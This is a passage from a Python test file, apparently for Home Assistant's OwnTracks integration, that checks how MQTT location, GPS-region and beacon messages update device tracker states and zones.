"zone.ram_phone_exp_wayp1",
"zone.ram_phone_exp_wayp2",
]
LWT_MESSAGE = {"_type": "lwt", "tst": 1}
BAD_MESSAGE = {"_type": "unsupported", "tst": 1}
BAD_JSON_PREFIX = "--$this is bad json#--"
BAD_JSON_SUFFIX = "** and it ends here ^^"
# pylint: disable=invalid-name, len-as-condition, redefined-outer-name
@pytest.fixture
def setup_comp(hass, mock_device_tracker_conf, mqtt_mock):
"""Initialize components."""
assert hass.loop.run_until_complete(
async_setup_component(hass, "persistent_notification", {})
)
hass.loop.run_until_complete(async_setup_component(hass, "device_tracker", {}))
hass.states.async_set("zone.inner", "zoning", INNER_ZONE)
hass.states.async_set("zone.inner_2", "zoning", INNER_ZONE)
hass.states.async_set("zone.outer", "zoning", OUTER_ZONE)
yield
async def setup_owntracks(hass, config, ctx_cls=owntracks.OwnTracksContext):
"""Set up OwnTracks."""
MockConfigEntry(
domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
).add_to_hass(hass)
with patch.object(owntracks, "OwnTracksContext", ctx_cls):
assert await async_setup_component(hass, "owntracks", {"owntracks": config})
await hass.async_block_till_done()
@pytest.fixture
def context(hass, setup_comp):
"""Set up the mocked context."""
orig_context = owntracks.OwnTracksContext
context = None
# pylint: disable=no-value-for-parameter
def store_context(*args):
"""Store the context."""
nonlocal context
context = orig_context(*args)
return context
hass.loop.run_until_complete(
setup_owntracks(
hass,
{
CONF_MAX_GPS_ACCURACY: 200,
CONF_WAYPOINT_IMPORT: True,
CONF_WAYPOINT_WHITELIST: ["jon", "greg"],
},
store_context,
)
)
def get_context():
"""Get the current context."""
return context
yield get_context
async def send_message(hass, topic, message, corrupt=False):
"""Test the sending of a message."""
str_message = json.dumps(message)
if corrupt:
mod_message = BAD_JSON_PREFIX + str_message + BAD_JSON_SUFFIX
else:
mod_message = str_message
async_fire_mqtt_message(hass, topic, mod_message)
await hass.async_block_till_done()
await hass.async_block_till_done()
def assert_location_state(hass, location):
"""Test the assertion of a location state."""
state = hass.states.get(DEVICE_TRACKER_STATE)
assert state.state == location
def assert_location_latitude(hass, latitude):
"""Test the assertion of a location latitude."""
state = hass.states.get(DEVICE_TRACKER_STATE)
assert state.attributes.get("latitude") == latitude
def assert_location_longitude(hass, longitude):
"""Test the assertion of a location longitude."""
state = hass.states.get(DEVICE_TRACKER_STATE)
assert state.attributes.get("longitude") == longitude
def assert_location_accuracy(hass, accuracy):
"""Test the assertion of a location accuracy."""
state = hass.states.get(DEVICE_TRACKER_STATE)
assert state.attributes.get("gps_accuracy") == accuracy
def assert_location_source_type(hass, source_type):
"""Test the assertion of source_type."""
state = hass.states.get(DEVICE_TRACKER_STATE)
assert state.attributes.get("source_type") == source_type
def assert_mobile_tracker_state(hass, location, beacon=IBEACON_DEVICE):
"""Test the assertion of a mobile beacon tracker state."""
dev_id = MOBILE_BEACON_FMT.format(beacon)
state = hass.states.get(dev_id)
assert state.state == location
def assert_mobile_tracker_latitude(hass, latitude, beacon=IBEACON_DEVICE):
"""Test the assertion of a mobile beacon tracker latitude."""
dev_id = MOBILE_BEACON_FMT.format(beacon)
state = hass.states.get(dev_id)
assert state.attributes.get("latitude") == latitude
def assert_mobile_tracker_accuracy(hass, accuracy, beacon=IBEACON_DEVICE):
"""Test the assertion of a mobile beacon tracker accuracy."""
dev_id = MOBILE_BEACON_FMT.format(beacon)
state = hass.states.get(dev_id)
assert state.attributes.get("gps_accuracy") == accuracy
async def test_location_invalid_devid(hass, context):
"""Test the update of a location."""
await send_message(hass, "owntracks/paulus/nexus-5x", LOCATION_MESSAGE)
state = hass.states.get("device_tracker.paulus_nexus_5x")
assert state.state == "outer"
async def test_location_update(hass, context):
"""Test the update of a location."""
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
assert_location_source_type(hass, "gps")
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
assert_location_state(hass, "outer")
async def test_location_update_no_t_key(hass, context):
"""Test the update of a location when message does not contain 't'."""
message = LOCATION_MESSAGE.copy()
message.pop("t")
await send_message(hass, LOCATION_TOPIC, message)
assert_location_source_type(hass, "gps")
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
assert_location_state(hass, "outer")
async def test_location_inaccurate_gps(hass, context):
"""Test the location for inaccurate GPS information."""
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_INACCURATE)
# Ignored inaccurate GPS. Location remains at previous.
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_longitude(hass, LOCATION_MESSAGE["lon"])
async def test_location_zero_accuracy_gps(hass, context):
"""Ignore the location for zero accuracy GPS information."""
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_ZERO_ACCURACY)
# Ignored inaccurate GPS. Location remains at previous.
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_longitude(hass, LOCATION_MESSAGE["lon"])
# ------------------------------------------------------------------------
# GPS based event entry / exit testing
async def test_event_gps_entry_exit(hass, context):
"""Test the entry event."""
# Entering the owntracks circular region named "inner"
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
# Enter uses the zone's gps co-ords
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# Updates ignored when in a zone
# note that LOCATION_MESSAGE is actually pretty far
# from INNER_ZONE and has good accuracy. I haven't
# received a transition message though so I'm still
# associated with the inner zone regardless of GPS.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
# Exit switches back to GPS
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
assert_location_state(hass, "outer")
# Left clean zone state
assert not context().regions_entered[USER]
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# Now sending a location update moves me again.
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
async def test_event_gps_with_spaces(hass, context):
"""Test the entry event."""
message = build_message({"desc": "inner 2"}, REGION_GPS_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner 2")
message = build_message({"desc": "inner 2"}, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# Left clean zone state
assert not context().regions_entered[USER]
async def test_event_gps_entry_inaccurate(hass, context):
"""Test the event for inaccurate entry."""
# Set location to the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_INACCURATE)
# I enter the zone even though the message GPS was inaccurate.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
async def test_event_gps_entry_exit_inaccurate(hass, context):
"""Test the event for inaccurate exit."""
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
# Enter uses the zone's gps co-ords
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_INACCURATE)
# Exit doesn't use inaccurate gps
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
# But does exit region correctly
assert not context().regions_entered[USER]
async def test_event_gps_entry_exit_zero_accuracy(hass, context):
"""Test entry/exit events with accuracy zero."""
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_ZERO)
# Enter uses the zone's gps co-ords
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_ZERO)
# Exit doesn't use zero gps
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
# But does exit region correctly
assert not context().regions_entered[USER]
async def test_event_gps_exit_outside_zone_sets_away(hass, context):
"""Test the event for exit zone."""
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_location_state(hass, "inner")
# Exit message far away GPS location
message = build_message({"lon": 90.0, "lat": 90.0}, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# Exit forces zone change to away
assert_location_state(hass, STATE_NOT_HOME)
async def test_event_gps_entry_exit_right_order(hass, context):
"""Test the event for ordering."""
# Enter inner zone
# Set location to the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_location_state(hass, "inner")
# Enter inner2 zone
message = build_message({"desc": "inner_2"}, REGION_GPS_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner_2")
# Exit inner_2 - should be in 'inner'
message = build_message({"desc": "inner_2"}, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner")
# Exit inner - should be in 'outer'
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
assert_location_state(hass, "outer")
async def test_event_gps_entry_exit_wrong_order(hass, context):
"""Test the event for wrong order."""
# Enter inner zone
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_location_state(hass, "inner")
# Enter inner2 zone
message = build_message({"desc": "inner_2"}, REGION_GPS_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner_2")
# Exit inner - should still be in 'inner_2'
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
assert_location_state(hass, "inner_2")
# Exit inner_2 - should be in 'outer'
message = build_message({"desc": "inner_2"}, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_location_accuracy(hass, REGION_GPS_LEAVE_MESSAGE["acc"])
assert_location_state(hass, "outer")
async def test_event_gps_entry_unknown_zone(hass, context):
"""Test the event for unknown zone."""
# Just treat as location update
message = build_message({"desc": "unknown"}, REGION_GPS_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_latitude(hass, REGION_GPS_ENTER_MESSAGE["lat"])
assert_location_state(hass, "inner")
async def test_event_gps_exit_unknown_zone(hass, context):
"""Test the event for unknown zone."""
# Just treat as location update
message = build_message({"desc": "unknown"}, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_location_state(hass, "outer")
async def test_event_entry_zone_loading_dash(hass, context):
"""Test the event for zone landing."""
# Make sure the leading - is ignored
# Owntracks uses this to switch on hold
message = build_message({"desc": "-inner"}, REGION_GPS_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner")
async def test_events_only_on(hass, context):
"""Test events_only config suppresses location updates."""
# Sending a location message that is not home
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
assert_location_state(hass, STATE_NOT_HOME)
context().events_only = True
# Enter and Leave messages
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_OUTER)
assert_location_state(hass, "outer")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
assert_location_state(hass, STATE_NOT_HOME)
# Sending a location message that is inside outer zone
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# Ignored location update. Location remains at previous.
assert_location_state(hass, STATE_NOT_HOME)
async def test_events_only_off(hass, context):
"""Test when events_only is False."""
# Sending a location message that is not home
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
assert_location_state(hass, STATE_NOT_HOME)
context().events_only = False
# Enter and Leave messages
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE_OUTER)
assert_location_state(hass, "outer")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
assert_location_state(hass, STATE_NOT_HOME)
# Sending a location message that is inside outer zone
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# Location update processed
assert_location_state(hass, "outer")
async def test_event_source_type_entry_exit(hass, context):
"""Test the entry and exit events of source type."""
# Entering the owntracks circular region named "inner"
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
# source_type should be gps when entering using gps.
assert_location_source_type(hass, "gps")
# owntracks shouldn't send beacon events with acc = 0
await send_message(
hass, EVENT_TOPIC, build_message({"acc": 1}, REGION_BEACON_ENTER_MESSAGE)
)
# We should be able to enter a beacon zone even inside a gps zone
assert_location_source_type(hass, "bluetooth_le")
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
# source_type should be gps when leaving using gps.
assert_location_source_type(hass, "gps")
# owntracks shouldn't send beacon events with acc = 0
await send_message(
hass, EVENT_TOPIC, build_message({"acc": 1}, REGION_BEACON_LEAVE_MESSAGE)
)
assert_location_source_type(hass, "bluetooth_le")
# Region Beacon based event entry / exit testing
async def test_event_region_entry_exit(hass, context):
"""Test the entry event."""
# Seeing a beacon named "inner"
await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
# Enter uses the zone's gps co-ords
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# Updates ignored when in a zone
# note that LOCATION_MESSAGE is actually pretty far
# from INNER_ZONE and has good accuracy. I haven't
# received a transition message though so I'm still
# associated with the inner zone regardless of GPS.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
# Exit switches back to GPS but the beacon has no coords
# so I am still located at the center of the inner region
# until I receive a location update.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
# Left clean zone state
assert not context().regions_entered[USER]
# Now sending a location update moves me again.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
assert_location_accuracy(hass, LOCATION_MESSAGE["acc"])
async def test_event_region_with_spaces(hass, context):
"""Test the entry event."""
message = build_message({"desc": "inner 2"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner 2")
message = build_message({"desc": "inner 2"}, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# Left clean zone state
assert not context().regions_entered[USER]
async def test_event_region_entry_exit_right_order(hass, context):
"""Test the event for ordering."""
# Enter inner zone
# Set location to the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# See 'inner' region beacon
await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
assert_location_state(hass, "inner")
# See 'inner_2' region beacon
message = build_message({"desc": "inner_2"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner_2")
# Exit inner_2 - should be in 'inner'
message = build_message({"desc": "inner_2"}, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner")
# Exit inner - should be in 'outer'
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
# I have not had an actual location update yet and my
# coordinates are set to the center of the last region I
# entered which puts me in the inner zone.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner")
async def test_event_region_entry_exit_wrong_order(hass, context):
"""Test the event for wrong order."""
# Enter inner zone
await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
assert_location_state(hass, "inner")
# Enter inner2 zone
message = build_message({"desc": "inner_2"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner_2")
# Exit inner - should still be in 'inner_2'
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
assert_location_state(hass, "inner_2")
# Exit inner_2 - should be in 'outer'
message = build_message({"desc": "inner_2"}, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# I have not had an actual location update yet and my
# coordinates are set to the center of the last region I
# entered which puts me in the inner_2 zone.
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_accuracy(hass, INNER_ZONE["radius"])
assert_location_state(hass, "inner_2")
async def test_event_beacon_unknown_zone_no_location(hass, context):
"""Test the event for unknown zone."""
# A beacon which does not match a HA zone is the
# definition of a mobile beacon. In this case, "unknown"
# will be turned into device_tracker.beacon_unknown and
# that will be tracked at my current location. Except
# in this case my Device hasn't had a location message
# yet so it's in an odd state where it has state.state
# None and no GPS coords to set the beacon to.
hass.states.async_set(DEVICE_TRACKER_STATE, None)
message = build_message({"desc": "unknown"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# My current state is None because I haven't seen a
# location message or a GPS or Region # Beacon event
# message. None is the state the test harness set for
# the Device during test case setup.
assert_location_state(hass, "None")
# We have had no location yet, so the beacon status
# set to unknown.
assert_mobile_tracker_state(hass, "unknown", "unknown")
async def test_event_beacon_unknown_zone(hass, context):
"""Test the event for unknown zone."""
# A beacon which does not match a HA zone is the
# definition of a mobile beacon. In this case, "unknown"
# will be turned into device_tracker.beacon_unknown and
# that will be tracked at my current location. First I
# set my location so that my state is 'outer'
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
assert_location_state(hass, "outer")
message = build_message({"desc": "unknown"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
# My state is still outer and now the unknown beacon
# has joined me at outer.
assert_location_state(hass, "outer")
assert_mobile_tracker_state(hass, "outer", "unknown")
async def test_event_beacon_entry_zone_loading_dash(hass, context):
"""Test the event for beacon zone landing."""
# Make sure the leading - is ignored
# Owntracks uses this to switch on hold
message = build_message({"desc": "-inner"}, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner")
# ------------------------------------------------------------------------
# Mobile Beacon based event entry / exit testing
async def test_mobile_enter_move_beacon(hass, context):
"""Test the movement of a beacon."""
# I am in the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# I see the 'keys' beacon. I set the location of the
# beacon_keys tracker to my current device location.
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
assert_mobile_tracker_latitude(hass, LOCATION_MESSAGE["lat"])
assert_mobile_tracker_state(hass, "outer")
# Location update to outside of defined zones.
# I am now 'not home' and neither are my keys.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
assert_location_state(hass, STATE_NOT_HOME)
assert_mobile_tracker_state(hass, STATE_NOT_HOME)
not_home_lat = LOCATION_MESSAGE_NOT_HOME["lat"]
assert_location_latitude(hass, not_home_lat)
assert_mobile_tracker_latitude(hass, not_home_lat)
async def test_mobile_enter_exit_region_beacon(hass, context):
"""Test the enter and the exit of a mobile beacon."""
# I am in the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# I see a new mobile beacon
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
assert_mobile_tracker_state(hass, "outer")
# GPS enter message should move beacon
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
assert_mobile_tracker_state(hass, REGION_GPS_ENTER_MESSAGE["desc"])
# Exit inner zone to outer zone should move beacon to
# center of outer zone
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
assert_mobile_tracker_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_mobile_tracker_state(hass, "outer")
async def test_mobile_exit_move_beacon(hass, context):
"""Test the exit move of a beacon."""
# I am in the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
# I see a new mobile beacon
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
assert_mobile_tracker_state(hass, "outer")
# Exit mobile beacon, should set location
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
assert_mobile_tracker_state(hass, "outer")
# Move after exit should do nothing
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
assert_mobile_tracker_state(hass, "outer")
async def test_mobile_multiple_async_enter_exit(hass, context):
"""Test the multiple entering."""
# Test race condition
for _ in range(0, 20):
async_fire_mqtt_message(
hass, EVENT_TOPIC, json.dumps(MOBILE_BEACON_ENTER_EVENT_MESSAGE)
)
async_fire_mqtt_message(
hass, EVENT_TOPIC, json.dumps(MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
)
async_fire_mqtt_message(
hass, EVENT_TOPIC, json.dumps(MOBILE_BEACON_ENTER_EVENT_MESSAGE)
)
await hass.async_block_till_done()
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert len(context().mobile_beacons_active["greg_phone"]) == 0
async def test_mobile_multiple_enter_exit(hass, context):
"""Test the multiple entering."""
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert len(context().mobile_beacons_active["greg_phone"]) == 0
async def test_complex_movement(hass, context):
"""Test a complex sequence representative of real-world use."""
# I am in the outer zone.
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
assert_location_state(hass, "outer")
# gps to inner location and event, as actually happens with OwnTracks
location_message = build_message(
{
"lat": REGION_GPS_ENTER_MESSAGE["lat"],
"lon": REGION_GPS_ENTER_MESSAGE["lon"],
},
LOCATION_MESSAGE,
)
await send_message(hass, LOCATION_TOPIC, location_message)
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
# region beacon enter inner event and location as actually happens
# with OwnTracks
location_message = build_message(
{
"lat": location_message["lat"] + FIVE_M,
"lon": location_message["lon"] + FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
# see keys mobile beacon and location message as actually happens
location_message = build_message(
{
"lat": location_message["lat"] + FIVE_M,
"lon": location_message["lon"] + FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
# Slightly odd, I leave the location by gps before I lose
# sight of the region beacon. This is also a little odd in
# that my GPS coords are now in the 'outer' zone but I did not
# "enter" that zone when I started up so my location is not
# the center of OUTER_ZONE, but rather just my GPS location.
# gps out of inner event and location
location_message = build_message(
{
"lat": REGION_GPS_LEAVE_MESSAGE["lat"],
"lon": REGION_GPS_LEAVE_MESSAGE["lon"],
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_mobile_tracker_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_location_state(hass, "outer")
assert_mobile_tracker_state(hass, "outer")
# region beacon leave inner
location_message = build_message(
{
"lat": location_message["lat"] - FIVE_M,
"lon": location_message["lon"] - FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, location_message["lat"])
assert_mobile_tracker_latitude(hass, location_message["lat"])
assert_location_state(hass, "outer")
assert_mobile_tracker_state(hass, "outer")
# lose keys mobile beacon
lost_keys_location_message = build_message(
{
"lat": location_message["lat"] - FIVE_M,
"lon": location_message["lon"] - FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, LOCATION_TOPIC, lost_keys_location_message)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert_location_latitude(hass, lost_keys_location_message["lat"])
assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
assert_location_state(hass, "outer")
assert_mobile_tracker_state(hass, "outer")
# gps leave outer
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
assert_location_latitude(hass, LOCATION_MESSAGE_NOT_HOME["lat"])
assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
assert_location_state(hass, "not_home")
assert_mobile_tracker_state(hass, "outer")
# location move not home
location_message = build_message(
{
"lat": LOCATION_MESSAGE_NOT_HOME["lat"] - FIVE_M,
"lon": LOCATION_MESSAGE_NOT_HOME["lon"] - FIVE_M,
},
LOCATION_MESSAGE_NOT_HOME,
)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, location_message["lat"])
assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
assert_location_state(hass, "not_home")
assert_mobile_tracker_state(hass, "outer")
async def test_complex_movement_sticky_keys_beacon(hass, context):
"""Test a complex sequence which was previously broken."""
# I am not_home
await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
assert_location_state(hass, "outer")
# gps to inner location and event, as actually happens with OwnTracks
location_message = build_message(
{
"lat": REGION_GPS_ENTER_MESSAGE["lat"],
"lon": REGION_GPS_ENTER_MESSAGE["lon"],
},
LOCATION_MESSAGE,
)
await send_message(hass, LOCATION_TOPIC, location_message)
await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
# see keys mobile beacon and location message as actually happens
location_message = build_message(
{
"lat": location_message["lat"] + FIVE_M,
"lon": location_message["lon"] + FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
# region beacon enter inner event and location as actually happens
# with OwnTracks
location_message = build_message(
{
"lat": location_message["lat"] + FIVE_M,
"lon": location_message["lon"] + FIVE_M,
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
# This sequence of moves would cause keys to follow
# greg_phone around even after the OwnTracks sent
# a mobile beacon 'leave' event for the keys.
# leave keys
await send_message(hass, LOCATION_TOPIC, location_message)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# leave inner region beacon
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# enter inner region beacon
